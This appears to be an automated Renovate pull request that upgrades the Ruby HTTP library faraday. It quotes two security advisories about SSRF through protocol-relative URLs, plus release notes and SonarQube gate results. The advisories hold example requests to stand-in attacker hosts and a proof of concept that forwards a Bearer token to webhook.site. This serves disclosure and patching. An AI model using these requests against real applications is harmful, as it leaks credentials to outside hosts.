Update dependency faraday to v2.14.2 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
faraday (source, changelog)	'2.8.1' → '2.14.2'

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

---

Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

CVE-2026-25765 / GHSA-33mh-2634-fwr2

More information

Details

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #​1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Severity

• CVSS Score: 5.8 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

References

• https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
• https://github.com/lostisland/faraday/pull/1569
• https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc
• https://github.com/lostisland/faraday/releases/tag/v2.14.1
• https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2
• https://www.rfc-editor.org/rfc/rfc3986#section-5.4
• https://nvd.nist.gov/vuln/detail/CVE-2026-25765
• https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-25765.yml
• https://github.com/lostisland/faraday/releases/tag/v1.10.5
• https://github.com/advisories/GHSA-33mh-2634-fwr2

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2: protocol-relative URI objects still bypass host scoping

CVE-2026-33637 / GHSA-5rv5-xj5j-3484

More information

Details

Summary

Faraday::Connection#build_exclusive_url still allows protocol-relative host override when the request target is provided as a URI object instead of a String. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and can redirect a request built from a fixed-base Faraday::Connection to an attacker-controlled host while preserving connection-scoped headers such as Authorization.

Affected Component

• Repository File(s)/Endpoint(s):
  • lib/faraday/connection.rb
  • lib/faraday/request.rb
  • spec/faraday/connection_spec.rb
  • spec/faraday/request_spec.rb
• Function(s):
  • Faraday::Connection#build_exclusive_url
  • Faraday::Connection#run_request
  • Faraday::Request#url
  • Faraday::Request#to_env
• Version(s) Tested:
  • Faraday 2.14.1
  • repository HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca

Attacker Profile

• Who: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection
• Access Required: Ability to supply data that the application converts to URI.parse(...) and passes to conn.get(...), [conn.post](http://conn.post/)(...), or req.url(...)
• Capability: Control over a protocol-relative URI such as URI("//evil.example/pwn")

Steps to Reproduce

1. Use the current repository checkout and load Faraday from lib/.
2. Build a fixed-base connection and provide a protocol-relative URI object to req.url.
3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host.
4. Observe that the connection-scoped Authorization header remains attached to the off-host request.

Verification Evidence

• Environment: macOS, Ruby from local environment, Faraday 2.14.1, faraday-net_http, local WEBrick listener on 127.0.0.1:4567, HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca
• Commands executed:

$ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start'
$ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body'

• PoC code (inline):

require "faraday"
require "faraday/net_http"

conn = Faraday.new(url: "http://trusted.example/base", headers: {
  "Authorization" => "Bearer secret-token"
}) { |f| f.adapter :net_http }

target = ["//127.0.0.1:4567", "/pwn"].join
resp = conn.get(URI(target))

puts resp.status
puts resp.body

• Exit code: 0
• stdout (relevant excerpt):

200
host=127.0.0.1
auth=Bearer secret-token
path=/pwn

• stderr (relevant excerpt):

N/A

• Artifacts: none

Additional External Confirmation

The issue was also independently reproduced against a public HTTP collector on Faraday 2.14.1 using the default net_http adapter:

require "faraday"
require "faraday/net_http"

conn = Faraday.new(
  url: "http://trusted.example/base",
  headers: { "Authorization" => "Bearer secret-token" }
) { |f| f.adapter :net_http }

target = ["//webhook.site", "/<collector-id>"].join
resp = conn.get(URI(target))
resp.status

##### => 200
resp.url.host

##### => "webhook.site"

This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage.

Supporting Materials

• Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2
• Existing CVE for the original string-based issue: CVE-2026-25765
• Existing regression tests for the string-only fix:
  • spec/faraday/connection_spec.rb:314-345
• Existing test proving supported URI request input:
  • spec/faraday/request_spec.rb:26-31

Impact

The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the
connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

Severity

• CVSS Score: 0.0 / 10 (Low)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

References

• https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484
• https://github.com/advisories/GHSA-33mh-2634-fwr2
• https://github.com/advisories/GHSA-5rv5-xj5j-3484

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

lostisland/faraday (faraday)

v2.14.2

Compare Source

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add Ruby 4 to CI by @​larouxn in #​1659
• Modernize RuboCop configuration and fix offenses by @​larouxn in #​1660
• Lint: Style/OneClassPerFile by @​olleolleolle in #​1668
• fix(docs): fix incorrect link label by @​JohnnyKei in #​1667
• chore: Upgrade package.json packages using audit fix by @​olleolleolle in #​1669

New Contributors

• @​larouxn made their first contribution in #​1659
• @​JohnnyKei made their first contribution in #​1667

Full Changelog: lostisland/faraday@v2.14.1...v2.14.2

v2.14.1

Compare Source

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot by @​Copilot in #​1642
• Add RFC document for Options architecture refactoring plan by @​Copilot in #​1644
• Bump actions/checkout from 5 to 6 by @​dependabot[bot] in #​1655
• Explicit top-level namespace reference by @​c960657 in #​1657

New Contributors

• @​Copilot made their first contribution in #​1642

Full Changelog: lostisland/faraday@v2.14.0...v2.14.1

v2.14.0

Compare Source

What's Changed

New features ✨

• Use newer UnprocessableContent naming for 422 by @​tylerhunt in #​1638

Fixes 🐞

• Convert strings to UTF-8 by @​c960657 in #​1624
• Fix Response#to_hash when response not finished yet by @​yykamei in #​1639

Misc/Docs 📄

• Lint: use filter_map by @​olleolleolle in #​1637
• Bump actions/checkout from v4 to v5 by @​dependabot[bot] in #​1636
• Fixes documentation by @​dharamgollapudi in #​1635

New Contributors

• @​c960657 made their first contribution in #​1624
• @​dharamgollapudi made their first contribution in #​1635
• @​tylerhunt made their first contribution in #​1638

Full Changelog: lostisland/faraday@v2.13.4...v2.14.0

v2.13.4

Compare Source

What's Changed

• Improve error handling logic and add missing test coverage by @​iMacTia in #​1633

Full Changelog: lostisland/faraday@v2.13.3...v2.13.4

v2.13.3

Compare Source

What's Changed

• Fix type assumption in Faraday::Error by @​iMacTia in #​1630

Full Changelog: lostisland/faraday@v2.13.2...v2.13.3

v2.13.2

Compare Source

What's Changed

• CI against Ruby 3.4 by @​Earlopain in #​1622
• Only load what is required from cgi by @​Earlopain in #​1623
• Lint rack_builder.rb: avoid naming a method by @​olleolleolle in #​1626
• Add migrating from rest-client docs section. by @​simi in #​1625
• Include HTTP method and URL in Faraday::Error messages for improved exception log transparency by @​nielsbuus in #​1628

New Contributors

• @​simi made their first contribution in #​1625
• @​nielsbuus made their first contribution in #​1628

Full Changelog: lostisland/faraday@v2.13.1...v2.13.2

v2.13.1

Compare Source

What's Changed

• Logger middleware default options by @​yenshirak in #​1618
• Fix Style/RedundantParentheses in options/env.rb by @​iMacTia in #​1620

New Contributors

• @​yenshirak made their first contribution in #​1618

Full Changelog: lostisland/faraday@v2.13.0...v2.13.1

v2.13.0

Compare Source

What's Changed

• feat(ssl options): support SNI hostname by @​bf4 in #​1615

New Contributors

• @​bf4 made their first contribution in #​1615

Full Changelog: lostisland/faraday@v2.12.3...v2.13.0

v2.12.3

Compare Source

What's Changed

• Remove ruby2_keywords by @​tisba in #​1616
• Fix thread safety issue by avoiding mutation of proxy options hash by @​QWYNG in #​1617

New Contributors

• @​QWYNG made their first contribution in #​1617

Full Changelog: lostisland/faraday@v2.12.2...v2.12.3

v2.12.2

Compare Source

What's Changed

• Use generic argument forwarding + remove ruby2_keywords by @​chaymaeBZ in #​1601
• [TEST] fix compatibility with ruby 3.4.0dev by @​mtasaka in #​1604
• Formatting the log using parameter progname for the logger by @​kodram in #​1606

New Contributors

• @​chaymaeBZ made their first contribution in #​1601
• @​mtasaka made their first contribution in #​1604
• @​kodram made their first contribution in #​1606

Full Changelog: lostisland/faraday@v2.12.1...v2.12.2

v2.12.1

Compare Source

What's Changed

• Allow faraday-net_http 3.4.x by @​richardmarbach in #​1599

New Contributors

• @​richardmarbach made their first contribution in #​1599

Full Changelog: lostisland/faraday@v2.12.0...v2.12.1

v2.12.0

Compare Source

What's Changed

New features ✨

• Make RaiseError middleware configurable to not raise error on certain status codes (e.g. 404) by @​clemens in #​1590

Fixes 🐞

• Add json as an explicit dependency by @​deivid-rodriguez in #​1589

Misc/Docs 📄

• docs: fix grammar by @​dijonkitchen in #​1588

New Contributors

• @​dijonkitchen made their first contribution in #​1588
• @​deivid-rodriguez made their first contribution in #​1589
• @​clemens made their first contribution in #​1590

Full Changelog: lostisland/faraday@v2.11.0...v2.12.0

v2.11.0

Compare Source

What's Changed

This release adds support for the ciphers SSL option (currently supported by the net_http adapter in v3.3+), as well as taking advantage of the support of chained certificates introduced in the net_http adapter in v3.2.
Also, it adds a new ParallelManager#execute interface that improves on the existing one and makes it easier for adapters to support parallel requests. This is currently used by the async-http adapter.

New features ✨

• Add support for a new ParallelManager#execute method. by @​iMacTia in #​1584
• Add ciphers attribute to SSLOptions by @​womblep in #​1582

Misc/Docs 📄

• Opt-in for MFA requirement explicitly by @​tagliala in #​1580
• Fix typos by @​tagliala in #​1585

New Contributors

• @​tagliala made their first contribution in #​1580
• @​womblep made their first contribution in #​1582

Full Changelog: lostisland/faraday@v2.10.1...v2.11.0

v2.10.1

Compare Source

What's Changed

• Update JS deps by @​olleolleolle in #​1574
• fix: Avoid lazy-initialized lock by @​olleolleolle in #​1577

Full Changelog: lostisland/faraday@v2.10.0...v2.10.1

v2.10.0

Compare Source

What's Changed

This release introduces support for middleware-level default_options 🎉
You can read more about it in the docs.

New features ✨

• Introduce Middleware DEFAULT_OPTIONS with Application and Instance Configurability by @​ryan-mcneil in #​1572

Bug Fixes 🐞

• Add logger as dependency by @​wynksaiddestroy in #​1573

Misc/Docs 📄

• Configure "npm" package-ecosystem for Dependabot by @​yykamei in #​1571

New Contributors

• @​wynksaiddestroy made their first contribution in #​1573
• @​ryan-mcneil made their first contribution in #​1572

Full Changelog: lostisland/faraday@v2.9.2...v2.10.0

v2.9.2

Compare Source

What's Changed

Bug Fixes 🐞

• Merge relative url without escaping (#​1567) by @​ykrods in #​1569

New Contributors

• @​ykrods made their first contribution in #​1569

Full Changelog: lostisland/faraday@v2.9.1...v2.9.2

v2.9.1

Compare Source

What's Changed

New features ✨

• Make dig method case-insensitive in Faraday::Utils::Headers by @​vitali-semenyuk in #​1557
• Add TooManyRequestsError (429) to error docs by @​tijmenb in #​1565

Bug Fixes 🐞

• Fix compatibility with Ruby 3.4.0-preview1 by @​m-nakamura145 in #​1560
• Support default json decoder even when nil responds to :load by @​gtmax in #​1563

Misc/Docs 📄

• add bundler config to dependabot by @​geemus in #​1548
• Add RuboCop disables for Style/ArgumentsForwarding by @​olleolleolle in #​1550
• docs: update body param type for run_request by @​G-Rath in #​1545
• Remove unnecessary rubocop disable comments. by @​iMacTia in #​1551
• Update rack requirement from ~> 2.2 to ~> 3.0 by @​dependabot in #​1549
• Use Rubygems Trusted Publishers to publish. by @​iMacTia in #​1552
• Lint fix: get to green by @​olleolleolle in #​1558
• Fix Rubocop errors by @​iMacTia in #​1561

New Contributors

• @​G-Rath made their first contribution in #​1545
• @​vitali-semenyuk made their first contribution in #​1557
• @​m-nakamura145 made their first contribution in #​1560
• @​gtmax made their first contribution in #​1563

Full Changelog: lostisland/faraday@v2.9.0...v2.9.1

v2.9.0

Compare Source

What's Changed

NOTE: This release removes support for Ruby 2.6 and 2.7, making Ruby 3.0 the minimum version.

• Remove runtime dependency on base64 by @​Earlopain in #​1541
• Make Ruby 3.0 the min version by @​iMacTia in #​1544
• Bump faraday-net_http version to allow 3.1 by @​iMacTia in #​1546

New Contributors

• @​Earlopain made their first contribution in #​1541

Full Changelog: lostisland/faraday@v2.8.1...v2.9.0

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[sonarqubecloud]

Quality Gate failed

Failed conditions
C Security Rating on New Code (required ≥ A)

See analysis details on SonarQube Cloud

Catch issues before they fail your Quality Gate with our IDE extension SonarQube for IDE